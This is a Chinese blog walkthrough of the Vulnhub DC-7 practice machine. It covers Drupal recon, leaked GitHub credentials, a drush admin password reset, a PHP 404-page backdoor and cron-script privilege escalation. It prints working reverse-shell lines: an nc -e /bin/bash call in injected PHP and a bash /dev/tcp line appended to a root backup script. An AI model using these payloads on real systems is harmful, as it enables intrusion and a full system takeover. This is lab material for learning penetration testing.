[Vulnhub] DC-7靶机渗透

最新推荐文章于 2024-07-26 16:34:21 发布
最新推荐文章于 2024-07-26 16:34:21 发布
阅读量170 收藏
点赞数
分类专栏: 靶场笔记 文章标签: 靶机 kali linux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605352/article/details/119513996
版权
本文详述了一次渗透测试的过程,从环境搭建开始,通过端口扫描和Web服务分析,利用GitHub源码泄露获取敏感信息,SSH远程登录,数据库信息挖掘,Web后台密码篡改,再到反弹shell和提权,最终获取目标系统的完全控制。整个过程突显了信息收集和安全防护的重要性。
摘要由CSDN通过智能技术生成

0x00 环境搭建

靶机地址:http://www.vulnhub.com/entry/dc-7,356/
下载之后用vmware打开即可,使用桥接模式。
开机后搭建完成:
在这里插入图片描述
本关只有一个flag,并提示了暴力破解不会成功。

0x01 主机端口探测

arp-scan -l探测内网存活主机,再用nmap -sV -p- ip来探测端口:
在这里插入图片描述
发现开启了80端口(HTTP服务)和22端口(SSH服务)

0x02 web渗透

访问80端口,发现是一个 Drupal 搭建的站:
在这里插入图片描述
目录扫描和 xray 扫了一下没发现什么利用点,查找CMS通杀漏洞,发现存在RCE,测试后也无法利用。

发现页面提示开发者是@DC7USER
在这里插入图片描述
查找相关信息发现 github 仓库:
在这里插入图片描述
在配置文件中发现数据库的账户密码:
在这里插入图片描述

0x03 SSH远程登录

用刚才的数据库账户密码发现可以SSH登录:
在这里插入图片描述
查看当前目录下的 mbox 文件,像是计划任务的执行日志记录,每15分钟执行一次backup.sh
在这里插入图片描述
查看这个脚本文件,发现该系统安装了drupal管理工具drush,并得到gpg加密密码:PickYourOwnPassword
在这里插入图片描述
解密文件: gpg -d website.tar.gz.gpg > website.tar.gz,在setting.php文件中发现数据库信息(别问,问就是之前那个数据库密码只能连ssh不能登录数据库):
在这里插入图片描述
连接数据库,找到用户名密码:
在这里插入图片描述
解密失败,用drush命令修改用户密码:drush user-password admin --password="hacker"
在这里插入图片描述
成功登录后台:
在这里插入图片描述

0x04 反弹shell

找到上传点,无法直接上传shell:
在这里插入图片描述
查询后得知需要加载php模块:
在这里插入图片描述
安装成功,勾选上:
在这里插入图片描述在这里插入图片描述
修改404页面:<?php system("nc 192.168.1.143 4444 -e /bin/bash");?>
在这里插入图片描述
攻击机监听得到反弹shell:
在这里插入图片描述

0x05 提权

修改备份脚本写入计划任务:echo "bash -i >& /dev/tcp/10.10.10.244/4444 0>&1" >> /opt/scripts/backups.sh
在这里插入图片描述
等待root执行计划任务,获得shell:
在这里插入图片描述

总结

主机发现 => 端口扫描 => 访问web服务 => gihub源码泄露 => ssh远程登录 => 发现数据库信息 => 得知用户名 => 修改用户密码 => 登录web页面 => 修改页面源码反弹shell => 找到flag

再次体现了信息泄露的危害和信息收集的重要性

参考链接:
https://www.cnblogs.com/chalan630/p/14185843.html

yAnd0n9
关注
专栏目录
Vulnhub靶机:DC-7渗透详细过程
IerkeU的博客
03-20 1117
DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场需要具备中级的渗透测试技巧,这并不是一个很有技术性的挑战,但也不能算容易。渗透测试的和之前的 DC 靶机(哪一台就不知道了)有相似的地方,但会涉及到一些新东西,你的最终目标是放在roo
Vulnhub靶机渗透学习记录:DC-7
Youanddream的博客
01-19 2718
dc-7 drupal drush gpg drupal后台getshell
DC-7靶机渗透测试GPG,drush,mkfifo,nc提权)
single_g_l的博客
08-13 1422
找到上传路径Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,需要安装插件,将php模块(https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz)导入(导入路径extend—>+Install new module),导入成功后在extend中添加模块。解锁之后,账号才成功登录。查看config文件,发现账号密码,尝试登录,发现报错,账号或密码不正确。...
vulnhub靶场 DC-1靶机 渗透详细过程
最新发布
黑战士的博客
07-26 1118
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
vulnhub DC-7 靶机 渗透测试
小松博客
05-28 144
我们打开这个人的界面,发现一个在GitHub上的神秘链接。映入眼帘的就是一个config.php,并且拿到了数据库的账号密码。这个drush 原来是dupal 的命令,具体可以参考这个链接内容。我们查看一下这个backups.sh文件,这个命令很奇怪。执行ls,发现有一个backup文件夹和mbox文件。跳出框框思考,我们在网页下面发现一个神秘代码。拿到shell,查看自己有哪些权限。发现没有php模块,我们自己加一个。等了好几分钟,shell终于到了。端口发现,开放80,22。登陆,进入后台模块管理。
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1855
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
vulnhub DC-5 靶机 渗透测试
小松博客
05-23 351
我们把这个文件复制出来 /usr/share/exploitdb/exploits/linux/local/41154.sh。进入shell模式,输入命令find / -perm /4000 2>/dev/null,查找具有SUID权限的命令。发现这下面的时间是在变的,每次刷新都不一样,这里和footer.php的php是一样的,所以我们推测是文件包含漏洞。注意,请不要在kali里面编译,亲测编译后的程序在靶机运行会报错,我是在Centos中编译的。发现一个footer.php,发现每次访问都不一样。
[Vulnhub] DC-1靶机渗透
weixin_45605352的博客
08-03 246
0x00 环境搭建 靶机地址:https://www.vulnhub.com/entry/dc-1,292/ 下载之后用vmware打开即可,使用桥接模式。 开机后搭建完成: 0x01 主机端口探测 用arp-scan -l 探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现开启了22端口(SSH服务)、80端口(HTTP服务)、111端口和57345端口(RPC服务) 0x02 web渗透 访问80端口 ...
[Vulnhub] DC-9靶机渗透
weixin_45605352的博客
08-10 476
0x00 环境搭建 靶机地址:http://www.vulnhub.com/entry/dc-9,412/ 下载之后用vmware打开即可,使用桥接模式。 开机后搭建完成: 0x01 主机端口探测 用arp-scan -l探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现开启了80端口(HTTP服务),22端口存在过滤机制(SSH服务) 0x02 web渗透 访问80端口,没判断出是什么CMS: 目录扫描,发现登录入口: xray扫描出一个sql注入: 尝试注入: 丢到
vulnhub靶场 DC-2靶机 渗透详细过程
黑战士的博客
02-21 1000
*4.rbash提权**
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1443
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
Pikachu靶场通关笔记
热门推荐
weixin_45605352的博客
03-27 1万+
一. Burte Force(暴力破解) “暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。 理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,所以断定一个系统是否存在暴力破解漏洞,其条件也不是绝对的。 我们说一个web应用系统存在暴力破解漏洞,一般是指该web应用系统没有采用或者采用了比较弱的
DVWA靶场通关笔记
weixin_45605352的博客
03-17 4112
文章目录Brute Force 暴力破解LowMediumHighImpossible防护总结:Command Injection 命令注入危害:LowMediumHighImpossible防护总结:CSRF 跨站请求伪造危害:LowMediumHighImpossible防护总结:File Inclusion 文件包含危害:LowMediumHighimpossible防护总结:File Upload 文件上传危害:LowMediumHighImpossible补充常见解析漏洞:防护总结:Insecur
[Vulnhub] serial-php反序列化漏洞
weixin_45605352的博客
05-05 816
0x01 环境搭建 漏洞环境:https://www.vulnhub.com/entry/serial-1,349/ 下载后使用Vmware打开 创建新的虚拟机: 选择客户机版本为Ubuntu 64位: 一直下一步,知道选择使用现有磁盘: 选择下载的vmdk磁盘文件: 开机,环境配置完成: 0x02 漏洞复现 探测主机存活及端口 用nmap探测主机存活,探测到存活主机192.168.1.111,开放了22端口和80端口: nmap -PS -T4 192.168.1.0/
[Vulnhub] PWNLAB-init Linux利用环境变量提权
weixin_45605352的博客
05-18 580
0x00 环境搭建 靶机地址:https://www.vulnhub.com/entry/pwnlab-init,158/ 下载之后用vmware打开即可,这里使用的是桥接模式。 开机后搭建完成: 0x01 主机端口探测 用arp-scan -l 探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现开放了80端口(HTTP服务)和3306端口(MySQL服务)。 0x02 web渗透 访问80端口,没有发现什么可以利用的点: 用nikto扫描,发现了config.php,里面可能
[Vulnhub] DC-3靶机渗透
weixin_45605352的博客
08-05 355
0x00 环境搭建 靶机地址:http://www.vulnhub.com/entry/dc-32,312/ 下载之后用vmware打开即可,使用桥接模式。 开机后搭建完成: 该靶场只有一个flag。 0x01 主机端口探测 用arp-scan -l 探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现只开启了80端口(HTTP服务) 0x02 web渗透 访问80端口,发现是一个 Joomla 搭建的站: 目录扫描,真正有用的目录不多: 从 README.txt 中获得 Jo
[Vulnhub] VulnOS version 2 Linux内核提权
weixin_45605352的博客
05-17 270
0x00 环境搭建 靶场地址:http://www.vulnhub.com/entry/vulnos-2,147/ 下载之后用 VBoxManage.exe 将 .vdi 格式转换成 .vmdk 格式,用 VMware 打开: VboxManage.exe clonehd 原文件.vdi 目标文件.vmdk --format VMDK 以桥接模式开机后搭建完成: 0x01 主机端口探测 用arp-scan -l 探测内网存活主机,在用nmap -sV -p- ip来探测端口: 发现开放了 22端口(
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值